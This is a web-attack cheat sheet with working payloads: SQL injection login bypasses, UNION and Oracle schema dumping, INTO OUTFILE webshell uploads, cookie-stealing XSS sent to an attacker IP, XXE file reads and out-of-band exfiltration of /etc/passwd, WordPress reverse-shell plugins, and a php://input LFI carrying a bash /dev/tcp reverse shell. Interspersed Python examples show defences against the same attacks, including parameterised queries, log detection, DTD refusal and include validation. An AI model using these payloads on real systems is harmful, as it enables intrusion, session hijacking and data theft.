# Web footholds

# Poison Null Byte

A null byte (`%00`) marks the end of a string for many C-based string handlers, so a filename that passes an extension check as `package.json.bak%00.md` can be opened by the underlying file call as `package.json.bak`, letting us bypass extension filters. The example below double-encodes it as `%2500`: that decodes once to `%00`, so it survives the first URL decode and only becomes a real null byte at a later decoding step.

```
http://10.10.73.124/ftp/package.json.bak%2500.md
```

# SQL injection

Bypass examples:

```
' or 1=1--       # Use this when username is not known
foo@bar.com'--   # Use this when username is known

' or 1=1 LIMIT 1 --
' or 1=1 LIMIT 1 -- -
' or 1=1 LIMIT 1#
' or 1#
' or 1=1 --
' or 1=1 -- -
```

NOTE: it can also be helpful to check whether any error messages show up by submitting a single quote (`'`).

# Union Injection

A UNION injection adds a UNION SELECT to the intended query, letting us run arbitrary queries and append their results to the intended query's results. The injected SELECT has to return the same number of columns as the original, or the query errors.

```
' UNION SELECT 1;-- -    # testing 1 column
' UNION SELECT 1,2;-- -  # testing 2 columns
```

Examples of what the query looks like on the server:

```
SELECT username from players where country = '[input]';                       # Typical query
SELECT username from players where country = '' UNION SELECT 1;-- -';         # Generic union injection testing 1 column
SELECT username from players where country = '' UNION SELECT user();-- -';    # Select database user
```

Upload a webshell:

```
' UNION SELECT "<?php SYSTEM($_REQUEST['cmd']); ?>" into OUTFILE '/var/www/html/webshell.php' -- -
' union all select 1,2,3,4,"<?php echo shell_exec($_GET['cmd']);?>",6 into OUTFILE 'c:/inetpub/wwwroot/webshell.php' -- -
```

Load a file:

```
union all select 1,2,3,4,load_file("c:/windows/system32/drivers/etc/hosts"),6
```
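As an added example (not from the original notes) covering both the login-bypass payloads and the UNION section above: the `players` query rebuilt against a constructed in-memory SQLite table, so the effect of string concatenation versus a bound parameter can be run. The table contents, the one-column probe written without its trailing `;`, and the result labels are assumptions of this demo.

```python
import sqlite3

def make_db() -> sqlite3.Connection:
    # Constructed stand-in for the "players" table used in the queries above.
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE players (username TEXT, country TEXT)")
    con.executemany("INSERT INTO players VALUES (?, ?)",
                    [("alice", "UK"), ("bob", "FR"), ("carol", "UK")])
    return con

def lookup_vulnerable(con, country: str) -> list:
    # String concatenation: the input becomes SQL text, exactly like
    # SELECT username from players where country = '[input]';
    sql = "SELECT username FROM players WHERE country = '" + country + "'"
    return [row[0] for row in con.execute(sql)]

def lookup_safe(con, country: str) -> list:
    # Bound parameter: the value never touches the SQL text, so quotes,
    # UNION and comment markers are only characters inside a country name.
    return [row[0] for row in
            con.execute("SELECT username FROM players WHERE country = ?", (country,))]

def probe_errors(con, payload: str) -> bool:
    # True when the injected query fails: the error signal used above to
    # find the column count (UNION needs matching column numbers).
    try:
        lookup_vulnerable(con, payload)
        return False
    except sqlite3.Error:
        return True

UNION_ONE_COL = "' UNION SELECT 1-- -"    # the page's one-column probe, without the ';'
UNION_TWO_COL = "' UNION SELECT 1,2-- -"  # two columns against a one-column SELECT
TAUTOLOGY = "' or 1=1--"                  # login-bypass payload from the section above

def demo() -> dict:
    con = make_db()
    return {
        "normal": lookup_vulnerable(con, "UK"),
        "vuln_union": lookup_vulnerable(con, UNION_ONE_COL),   # injected row appears
        "vuln_tautology": lookup_vulnerable(con, TAUTOLOGY),   # every row returned
        "two_col_errors": probe_errors(con, UNION_TWO_COL),    # column mismatch -> error
        "safe_union": lookup_safe(con, UNION_ONE_COL),         # literal match, no rows
        "safe_tautology": lookup_safe(con, TAUTOLOGY),         # literal match, no rows
    }

if __name__ == "__main__":
    for label, value in demo().items():
        print(f"{label:15} {value}")
```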

# Oracle Union Injection

Run through ORDER BY expressions to see how many columns are available:

```
' order by 1--
' order by 2--
' order by 3--
' order by 4--
Something went wrong with the search: java.sql.SQLSyntaxErrorException: ORA-01785: ORDER BY item must be the number of a SELECT-list expression
```

The error appears at `order by 4`, so there are 3 columns.

```
' union select 1,2,3 from users--
' union select null,null,null from users--

# let's see which column we can get
' union select '1111',null,null from users--
1111 with title null from 0

# OK, the first column works; let's get the Oracle version
' union select (select banner from v$version where rownum=1),null,null from users--
Oracle Database 18c Express Edition Release 18.0.0.0.0 - Production with title null from 0

# let's get table names
' union select table_name,null,null from all_tables--

# let's get column names
' union select column_name,null,null from all_tab_columns where table_name='users'--
PASSWORD with title null from 0
USER_ID with title null from 0
USER_NAME with title null from 0

# let's dump the table by concatenating columns with '||'
' union select USER_NAME||PASSWORD,null,null from users--
```
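From the defender's side, an added example (not part of the original notes) that runs the enumeration steps above against constructed web-server access-log lines and flags the probe signatures: ORDER BY counting, UNION SELECT, the `v$version` / `all_tables` / `all_tab_columns` lookups and the trailing comment markers. The log format, IP addresses and signature names are assumptions of this example.

```python
import re
from urllib.parse import unquote_plus

# Signatures for the probes walked through above; names are this example's own labels.
SIGNATURES = [
    ("order-by column probe", re.compile(r"\border\s+by\s+\d+")),
    ("union select", re.compile(r"\bunion\s+(all\s+)?select\b")),
    ("oracle version lookup", re.compile(r"v\$version")),
    ("oracle schema enumeration", re.compile(r"\ball_tab(les|_columns)\b")),
    ("comment terminator", re.compile(r"(--|#)\s*$")),
]

# Combined-log-format line; only the fields the scan needs are captured.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<path>\S+) \S+" (?P<status>\d{3})')

def normalise(query: str) -> str:
    # Decode twice to see through double-encoding, then collapse case and
    # whitespace so "ORDER   BY" and "order+by" look the same to the regexes.
    text = unquote_plus(unquote_plus(query))
    return re.sub(r"\s+", " ", text).strip().lower()

def scan_line(line: str):
    """Return (ip, status, [signature names]) for a suspicious request, else None."""
    m = LOG_RE.match(line)
    if not m or "?" not in m.group("path"):
        return None
    query = normalise(m.group("path").split("?", 1)[1])
    hits = [name for name, rx in SIGNATURES if rx.search(query)]
    return (m.group("ip"), int(m.group("status")), hits) if hits else None

def scan(lines):
    return [hit for hit in map(scan_line, lines) if hit]

# Constructed access log: one benign search, then the page's three probes.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /search?q=oracle HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:01 +0000] "GET /search?q=%27+order+by+4-- HTTP/1.1" 500 233
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /search?q=%27+union+select+(select+banner+from+v%24version+where+rownum%3D1),null,null+from+users-- HTTP/1.1" 200 700
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /search?q=%27+union+select+column_name,null,null+from+all_tab_columns+where+table_name%3D%27users%27-- HTTP/1.1" 200 800
""".splitlines()

if __name__ == "__main__":
    for ip, status, hits in scan(SAMPLE_LOG):
        print(ip, status, ", ".join(hits))
```

The 500 on the `order by 4` request is the same error signal the walkthrough above relies on, so a probe followed by an error status is worth alerting on even without a signature match.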

# XSS

# Stored XSS / session hijack

Stored XSS is the most dangerous type of XSS, where the malicious string originates from the website's database. It occurs when a website inserts unsanitised user input into the database and later renders it to other users.

Use XSS to send cookie information to a server you control.

```
<script>new Image().src="http://10.10.10.10/bogus.php?output="+document.cookie;</script>
alert(document.domain)
alert(window.origin)
```

# Reflected XSS

The payload is part of the victim's request to the website, and the website includes it in the response back to the user. Examples:

```
<script>alert("Hello World")</script>
<script>alert(window.location.hostname)</script>
```

# DOM-Based XSS

Here the payload changes the structure of the page (the DOM) in the victim's browser, for example:

```
<script>document.querySelector('#title').textContent = 'I am a hacker'</script>
```

# XXE

An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. Synack has a great writeup about this: https://www.synack.com/blog/a-deep-dive-into-xxe-injection/

# In-band examples

Display arbitrary text:

```xml
<?xml version="1.0"?>
<!DOCTYPE replace [<!ENTITY example "cookbook">]>
<userInfo>
  <firstName>Redteam</firstName>
  <lastName>&example;</lastName>
</userInfo>
```

Reading a local file:

```xml
<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY read SYSTEM 'file:///etc/passwd'>]>
<root>&read;</root>
```

# Out-of-band example

Note the `&exfil;` reference: it must be included somewhere in the XML body for the attack to work.

```xml
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY % sp SYSTEM "http://10.10.10.10/dtd.xml">
%sp;
%param1;
]>
<bugreport>
  <title>testing</title>
  <cwe>Bar</cwe>
  <cvss>Baz</cvss>
  <reward>&exfil;</reward>
</bugreport>
```

On the attacking machine, start a simple web server (`python3 -m http.server 80`) and create the DTD file used in the attack:

```sh
cat > dtd.xml <<'EOF'
<!ENTITY % data SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://10.10.10.10/dtd.xml?%data;'>">
EOF
```

Look for GET requests on the simple server and base64-decode the exfiltrated data they carry.
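As an added hardening example (not code from the original notes), an expat-based parser that refuses any DOCTYPE, which stops the in-band and out-of-band payloads above before a single entity is resolved. The constructed one-line documents and the flat `{tag: text}` output shape are this example's assumptions.

```python
import xml.parsers.expat

class DoctypeForbidden(ValueError):
    """Raised the moment a DOCTYPE appears: no DTD means no entities at all."""

def parse_untrusted(doc: str) -> dict:
    """Parse a flat document like <userInfo> above into {tag: text}, refusing any DTD."""
    parser = xml.parsers.expat.ParserCreate()
    fields, open_tags = {}, []

    def on_doctype(name, sysid, pubid, has_internal_subset):
        # Fires before the internal subset is read, so internal entities (&example;),
        # SYSTEM entities (file:///etc/passwd) and parameter entities (%sp;) are
        # all rejected before the parser could resolve anything.
        raise DoctypeForbidden(f"DOCTYPE {name!r} is not allowed in untrusted input")

    def on_text(data):
        if open_tags and data.strip():
            fields[open_tags[-1]] = fields.get(open_tags[-1], "") + data.strip()

    parser.StartDoctypeDeclHandler = on_doctype
    parser.StartElementHandler = lambda tag, attrs: open_tags.append(tag)
    parser.EndElementHandler = lambda tag: open_tags.pop()
    parser.CharacterDataHandler = on_text
    parser.Parse(doc, True)  # an exception raised in a handler propagates out of Parse()
    return fields

def is_rejected(doc: str) -> bool:
    try:
        parse_untrusted(doc)
    except DoctypeForbidden:
        return True
    return False

# Constructed one-line copies of the three payload shapes from this section, plus a clean document.
INTERNAL_ENTITY = ('<?xml version="1.0"?><!DOCTYPE replace [<!ENTITY example "cookbook">]>'
                   '<userInfo><lastName>&example;</lastName></userInfo>')
FILE_READ = ('<?xml version="1.0"?><!DOCTYPE root [<!ENTITY read SYSTEM "file:///etc/passwd">]>'
             '<root>&read;</root>')
OOB_PARAM = ('<?xml version="1.0"?><!DOCTYPE r [<!ELEMENT r ANY><!ENTITY % sp SYSTEM '
             '"http://10.10.10.10/dtd.xml">%sp;]><bugreport><reward>&exfil;</reward></bugreport>')
CLEAN = ('<?xml version="1.0"?><userInfo><firstName>Redteam</firstName>'
         '<lastName>Smith</lastName></userInfo>')

if __name__ == "__main__":
    print(parse_untrusted(CLEAN))
    for name in ("INTERNAL_ENTITY", "FILE_READ", "OOB_PARAM"):
        print(name, "rejected:", is_rejected(globals()[name]))
```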

# WordPress plugins

Zip up a robust PHP file as a plugin. Plugins are typically stored in the wp-content/plugins/ directory, so to execute your reverse shell after uploading, browse to something like the following:

```
www.example.com/wp-content/wp-revshell/revshell.php
```

# LFI (Local File Inclusion)

# PHP wrappers

PHP provides several protocol wrappers which can be used to exploit directory traversal and local file inclusion vulnerabilities.

```
http://10.10.10.10/admin.php?file=data:text/plain,<?php echo shell_exec("ls") ?>
```

```sh
curl -s --data "<?system('ls -la');?>" "http://10.10.10.10/internal/advanced_comment_system/admin.php?ACS_path=php://input%00"
curl -s --data "<?system('bash -i >& /dev/tcp/10.10.10.10/443 0>&1');?>" "http://10.10.10.10/internal/advanced_comment_system/admin.php?ACS_path=php://input%00"
```
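An added example (not from the original notes) serving both the Poison Null Byte section and the PHP wrappers section: an include-parameter validator for a `?file=` / `?ACS_path=` style value, run over the inputs seen on this page. The allowlist, the include root and the rejection labels are constructed assumptions.

```python
import posixpath
from urllib.parse import unquote

# Constructed allowlist and include root: the only pages admin.php?file= may load.
ALLOWED_PAGES = {"dashboard", "users", "settings"}
INCLUDE_ROOT = "/var/www/html/pages"

def classify_include(raw_param: str) -> str:
    """Return 'ok:<path>' or 'reject:<reason>' for a ?file= / ?ACS_path= value."""
    # Decode twice so a double-encoded null (%2500 -> %00 -> NUL) is seen, and
    # also refuse a literal %00 that survives a single decode.
    once = unquote(raw_param)
    twice = unquote(once)
    if "\x00" in twice or "%00" in once:
        return "reject:null-byte"
    # php://, data:, file://, http://: any scheme selects a stream wrapper, not a page.
    if ":" in twice:
        return "reject:wrapper"
    # Absolute paths, ".." segments and backslashes leave the include root.
    if twice.startswith("/") or "\\" in twice or ".." in twice.split("/"):
        return "reject:traversal"
    if twice not in ALLOWED_PAGES:
        return "reject:not-allowlisted"
    # Only a known name reaches the filesystem, with the extension added here.
    return "ok:" + posixpath.join(INCLUDE_ROOT, twice + ".php")

# Inputs from this section and the null-byte section (constructed copies), with expected verdicts.
PAGE_INPUTS = {
    "settings": "ok:/var/www/html/pages/settings.php",
    'data:text/plain,<?php echo shell_exec("ls") ?>': "reject:wrapper",
    "php://input%00": "reject:null-byte",
    "package.json.bak%2500.md": "reject:null-byte",
    "../../etc/passwd": "reject:traversal",
    "login": "reject:not-allowlisted",
}

def check_all() -> bool:
    return all(classify_include(raw) == want for raw, want in PAGE_INPUTS.items())

if __name__ == "__main__":
    for raw in PAGE_INPUTS:
        print(f"{raw!r:50} -> {classify_include(raw)}")
```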